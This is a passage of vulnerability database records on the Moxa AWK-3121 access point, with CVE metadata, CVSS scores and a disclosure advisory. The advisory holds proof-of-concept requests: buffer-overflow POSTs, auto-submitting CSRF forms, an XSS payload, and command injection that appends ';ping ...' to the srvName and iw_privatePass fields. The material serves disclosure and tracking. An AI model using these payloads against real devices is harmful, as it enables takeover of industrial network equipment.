"date": "2019-06-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-329"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-11T00:00:00",
"db": "VULHUB",
"id": "VHN-120487"
},
{
"date": "2019-06-11T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10701"
},
{
"date": "2019-12-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015618"
},
{
"date": "2019-06-11T13:43:35.030000",
"db": "NVD",
"id": "CVE-2018-10701"
},
{
"date": "2019-12-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-329"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-329"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa AWK-3121 Buffer error vulnerability in device",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015618"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-329"
}
],
"trust": 0.6
}
}
VAR-201906-0782
Vulnerability from variot - Updated: 2023-12-18 12:00An issue was discovered on Moxa AWK-3121 1.14 devices. The session cookie "Password508" does not have an HttpOnly flag. This allows an attacker who is able to execute a cross-site scripting attack to steal the cookie very easily. Moxa AWK-3121 The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server.
[VulnerabilityType Other] HTTP traffic by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It is intended that an administrator can download /systemlog.log (the system log). However, the same functionality allows an attacker to download the file without any authentication or authorization.
[Additional Information] POC http://192.168.127.253//systemlog.log
[Vulnerability Type] Incorrect Access Control
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[VulnerabilityType Other] Missing HttpOnly flag on session cookie
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. The POST parameter "srvName" is susceptible to a buffer overflow.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0
srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user's computer very easily as well.
[VulnerabilityType Other] Open WiFi Connection
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Device
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides alert functionality so that an administrator can send emails to his/her account when there are changes to the device's network. The POST parameters "to1,to2,to3,to4" are all susceptible to buffer overflow.
[Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f
server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.)
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a web interface to allow an administrator to manage the device. However, this interface is not protected against CSRF attacks, which allows an attacker to trick an administrator into executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and forms/webSetMainRestart URIs.
[Additional Information] POC to change name of the device
<html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
<html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Request Forgery (CSRF)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. The POST parameter "srvName" is susceptible to this injection.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333
srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp
[VulnerabilityType Other] Command injection in Ping functionality
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device enables an unencrypted TELNET service by default. Also an attacker can easily connect to the TELNET daemon using the default credentials if they have not been changed by the user.
[VulnerabilityType Other] Insecure service Telnet enabled by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Telnet daemon
[Attack Type] Remote
[Impact Code execution] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides certfile upload functionality so that an administrator can upload a certificate file used for connecting to the wireless network. The POST parameter "iw_privatePass" is susceptible to this injection.
[Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562
... 114782935826962 Content-Disposition: form-data; name="iw_privatePass"
;ping -c 9 192.168.127.103 ##
... 114782935826962
Content-Disposition: form-data; name="bkpath"
/wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection"
certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex"
0 ... 114782935826962 Content-Disposition: form-data; name="Submit"
Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1"
test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml
<a id="a"<b id="b"hey!</b</a ... 114782935826962--
[VulnerabilityType Other] Command injection in file upload
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides functionality so that an administrator can change the name of the device. The POST parameter "iw_board_deviceName" is susceptible to this injection.
[Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.9
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. The POST parameter "iw_filename" is susceptible to buffer overflow.
[Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec
... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream
ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage"
tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip"
ping -c 3 192.168.127.101
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp ... 7e21a62f2905ca--
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. The POST parameter "iw_filename" is susceptible to command injection via shell metacharacters.
[Additional Information] POC
<html <body <script function submitRequest() { var formData = new FormData();
formData.append("iw_filename", ";ping -c 9 192.168.127.103 ##");
formData.append("iw_storage", "tftp");
formData.append("iw_serverip", "192.168.1.101");
formData.append("bkpath", "/wireless_cert.asp?index=1");
// HTML file input, chosen by user formData.append("certFile1", "test.txt");
// JavaScript file-like object var content = '<a id="a"<b id="b"hey!
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0782",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "awk-3121",
"scope": "eq",
"trust": 1.8,
"vendor": "moxa",
"version": "1.14"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015587"
},
{
"db": "NVD",
"id": "CVE-2018-10692"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3121_firmware:1.14:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3121:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10692"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samuel Huntley",
"sources": [
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 0.1
},
"cve": "CVE-2018-10692",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-10692",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-120477",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-10692",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-10692",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-320",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-120477",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-10692",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120477"
},
{
"db": "VULMON",
"id": "CVE-2018-10692"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015587"
},
{
"db": "NVD",
"id": "CVE-2018-10692"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-320"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Moxa AWK-3121 1.14 devices. The session cookie \"Password508\" does not have an HttpOnly flag. This allows an attacker who is able to execute a cross-site scripting attack to steal the cookie very easily. Moxa AWK-3121 The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. \n The device by default allows HTTP traffic thus\n providing an insecure communication mechanism for a user connecting to\n the web server. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n HTTP traffic by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n \n2. \n It is intended that an administrator can download /systemlog.log (the system\n log). However, the same functionality allows an attacker to download\n the file without any authentication or authorization. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n http://192.168.127.253//systemlog.log\n \n ------------------------------------------\n \n [Vulnerability Type]\n Incorrect Access Control\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can navigate to URL and download the systemlog file without any authentication or authorization\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n3. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Missing HttpOnly flag on session cookie\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can use cross-site scripting attack to access the session cookie \"Password508\" which can allow an attacker to login into the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n4. \n It provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. The POST parameter \"srvName\" is susceptible to a buffer\n overflow. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0\n \n srvName=AAAAAA (etc.) EEEEEE\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n5. \n The device provides a Wi-Fi connection that is open and does not use\n any encryption mechanism by default. An administrator who uses the\n open wireless connection to set up the device can allow an\n attacker to sniff the traffic passing between the user\u0027s computer and the\n device. This can allow an attacker to steal the credentials passing\n over the HTTP connection as well as TELNET traffic. Also an attacker\n can MITM the response and infect a user\u0027s computer very easily as\n well. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Open WiFi Connection\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Device\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can monitor the Wifi channels using Kismet or some other\n opensource software and an wireless card in monitor mode and sniff all\n the traffic including HTTP traffic as well as SSH and Telnet traffic. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n6. \n It provides alert functionality so that an\n administrator can send emails to his/her account when there are\n changes to the device\u0027s network. The POST parameters\n \"to1,to2,to3,to4\" are all susceptible to buffer overflow. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_SendTestEmail HTTP/1.1\n Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f\n \n server=server.mail.com\u0026username=test\u0026password=test\u0026from=test@mail.com\u0026to1=AAAAAAAAAA (etc.)\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n7. \n The device provides a web interface to allow an administrator to\n manage the device. However, this interface is not protected against\n CSRF attacks, which allows an attacker to trick an administrator into\n executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and\n forms/webSetMainRestart URIs. \n \n ------------------------------------------\n \n [Additional Information]\n POC to change name of the device \n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK-ROMEO\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/webSetMainRestart\" method=\"GET\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"SaveValue\" value=\"1\" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Request Forgery (CSRF)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can trick an administrator of the device to visit an\n attacker controlled page while connected to the network and thus trick\n to change the password or any other setting\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n8. \n The Moxa AWK 3121 provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. The POST parameter \"srvName\" is susceptible to this\n injection. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333\n \n srvName=192.168.127.102;ping -c 8 192.168.127.101;##\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in Ping functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n 